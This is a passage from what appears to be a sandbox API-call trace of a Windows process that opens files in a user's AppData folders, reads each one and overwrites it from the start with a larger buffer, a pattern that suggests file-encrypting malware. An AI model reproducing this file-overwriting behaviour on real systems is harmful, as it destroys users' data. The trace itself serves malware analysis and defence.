lpMultiByteStr="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpUsedDefaultChar=0x0) returned 65 [0165.986] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6e3, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x345f2bc*=0x6e3, lpOverlapped=0x0) returned 1 [0166.437] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0166.438] WriteFile (in: hFile=0x1dc, lpBuffer=0x289d9d8*, nNumberOfBytesToWrite=0xc6b, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x289d9d8*, lpNumberOfBytesWritten=0x345f2d0*=0xc6b, lpOverlapped=0x0) returned 1 [0166.438] CloseHandle (hObject=0x1dc) returned 1 [0166.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0167.886] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0167.886] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x166 [0167.887] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0167.887] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.887] ReleaseMutex (hMutex=0x168) returned 1 [0167.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0167.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", lpUsedDefaultChar=0x0) returned 65 [0167.887] ReadFile (in: hFile=0x204, lpBuffer=0x26a93e8, nNumberOfBytesToRead=0x166, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a93e8*, lpNumberOfBytesRead=0x345f2bc*=0x166, lpOverlapped=0x0) returned 1 [0167.888] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0167.888] WriteFile (in: hFile=0x204, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x6ee, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x345f2d0*=0x6ee, lpOverlapped=0x0) returned 1 [0167.889] CloseHandle (hObject=0x204) returned 1 [0167.889] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0167.890] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0167.890] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x194 [0167.890] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0167.891] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0167.891] ReleaseMutex (hMutex=0x168) returned 1 [0167.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0167.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpUsedDefaultChar=0x0) returned 65 [0167.891] ReadFile (in: hFile=0x204, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x194, lpOverlapped=0x0) returned 1 [0167.892] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0167.892] WriteFile (in: hFile=0x204, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x345f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0167.893] CloseHandle (hObject=0x204) returned 1 [0167.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0168.636] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0168.636] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xdc [0168.637] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0168.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0168.637] ReleaseMutex (hMutex=0x168) returned 1 [0168.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0168.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpUsedDefaultChar=0x0) returned 32 [0168.637] ReadFile (in: hFile=0x20c, lpBuffer=0x26c48c8, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c48c8*, lpNumberOfBytesRead=0x345f2bc*=0xdc, lpOverlapped=0x0) returned 1 [0168.638] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0168.638] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x664, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x345f2d0*=0x664, lpOverlapped=0x0) returned 1 [0168.639] CloseHandle (hObject=0x20c) returned 1 [0168.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0170.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0170.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x182 [0170.058] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0170.058] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0170.058] ReleaseMutex (hMutex=0x168) returned 1 [0170.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0170.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpUsedDefaultChar=0x0) returned 65 [0170.058] ReadFile (in: hFile=0x130, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x182, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x182, lpOverlapped=0x0) returned 1 [0170.059] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0170.060] WriteFile (in: hFile=0x130, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x70a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x345f2d0*=0x70a, lpOverlapped=0x0) returned 1 [0170.060] CloseHandle (hObject=0x130) returned 1 [0170.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0171.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x188 [0171.056] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.056] ReleaseMutex (hMutex=0x168) returned 1 [0171.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0171.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpUsedDefaultChar=0x0) returned 65 [0171.056] ReadFile (in: hFile=0x1dc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x188, lpOverlapped=0x0) returned 1 [0171.057] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0171.057] WriteFile (in: hFile=0x1dc, lpBuffer=0x286daa8*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286daa8*, lpNumberOfBytesWritten=0x345f2d0*=0x710, lpOverlapped=0x0) returned 1 [0171.058] CloseHandle (hObject=0x1dc) returned 1 [0171.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0171.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1ec [0171.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.931] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.931] ReleaseMutex (hMutex=0x168) returned 1 [0171.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0171.932] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpUsedDefaultChar=0x0) returned 65 [0171.932] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1ec, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x345f2bc*=0x1ec, lpOverlapped=0x0) returned 1 [0171.933] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0171.933] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x774, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x345f2d0*=0x774, lpOverlapped=0x0) returned 1 [0171.933] CloseHandle (hObject=0x1d8) returned 1 [0171.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0171.934] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.934] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x194 [0171.934] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.934] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.934] ReleaseMutex (hMutex=0x168) returned 1 [0171.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0171.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cchWideChar=65, lpMultiByteStr=0x1fac5ac, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpUsedDefaultChar=0x0) returned 65 [0171.935] ReadFile (in: hFile=0x1d8, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x194, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x345f2bc*=0x194, lpOverlapped=0x0) returned 1 [0171.936] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0171.936] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840958*, nNumberOfBytesToWrite=0x71c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2840958*, lpNumberOfBytesWritten=0x345f2d0*=0x71c, lpOverlapped=0x0) returned 1 [0171.936] CloseHandle (hObject=0x1d8) returned 1 [0171.936] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0171.937] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.937] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2cf [0171.937] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0171.938] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0171.938] ReleaseMutex (hMutex=0x168) returned 1 [0171.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployment.properties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0171.938] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployment.properties", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deployment.properties", lpUsedDefaultChar=0x0) returned 21 [0171.938] ReadFile (in: hFile=0x1d8, lpBuffer=0x2893a98, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2893a98*, lpNumberOfBytesRead=0x345f2bc*=0x2cf, lpOverlapped=0x0) returned 1 [0171.957] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0171.957] WriteFile (in: hFile=0x1d8, lpBuffer=0x2846ab8*, nNumberOfBytesToWrite=0x857, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2846ab8*, lpNumberOfBytesWritten=0x345f2d0*=0x857, lpOverlapped=0x0) returned 1 [0174.162] CloseHandle (hObject=0x1d8) returned 1 [0174.162] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.164] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.164] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3a5 [0174.165] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0174.165] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.165] ReleaseMutex (hMutex=0x168) returned 1 [0174.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0174.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", cchWideChar=44, lpMultiByteStr=0x1fb3d9c, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpUsedDefaultChar=0x0) returned 44 [0174.165] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x3a5, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x345f2bc*=0x3a5, lpOverlapped=0x0) returned 1 [0174.194] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0174.194] WriteFile (in: hFile=0x1d8, lpBuffer=0x2848988*, nNumberOfBytesToWrite=0x92d, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848988*, lpNumberOfBytesWritten=0x345f2d0*=0x92d, lpOverlapped=0x0) returned 1 [0174.194] CloseHandle (hObject=0x1d8) returned 1 [0174.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fE9qAG68hQ neYKyzOA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fe9qag68hq neykyzoa.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0174.194] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, 